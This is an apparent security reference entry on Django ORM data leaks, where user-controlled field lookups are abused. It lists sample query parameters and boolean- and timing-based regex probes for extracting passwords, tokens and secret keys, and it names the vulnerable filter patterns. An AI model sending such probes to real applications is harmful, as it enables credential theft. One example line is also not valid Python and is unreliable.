Vulnerabilities where Django ORM field lookups can be manipulated to leak sensitive data through startswith filters, JSON extraction, or regex timing.
Django ORM Leak refers to vulnerabilities where Django's ORM can be manipulated through query parameters to leak sensitive data, particularly through field lookups, JSON field access, or regex-based timing attacks.
# Django allows field lookups via double underscore
# If user controls lookup field:
User.objects.filter(**{user_input: value})
# Attacker can query related fields:
?filter=password__startswith=a
?filter=email__contains=admin
?filter=token__regex=^abc# With JSONField, attackers can extract nested data
?filter=profile__secret_key__startswith=sk_
# Or enumerate structure:
?filter=settings__has_key=api_key# Boolean-based data extraction via filter existence
GET /api/users?password__regex=^a # Returns results?
GET /api/users?password__regex=^b # Returns results?
# Timing-based extraction
GET /api/users?password__regex=^a.* # Time response
GET /api/users?password__regex=^b.* # Compare times# Dangerous: User controls filter field name
Model.objects.filter(**request.GET.dict())
# Also dangerous: String formatting in filters
Model.objects.filter(f"{field}__contains": value)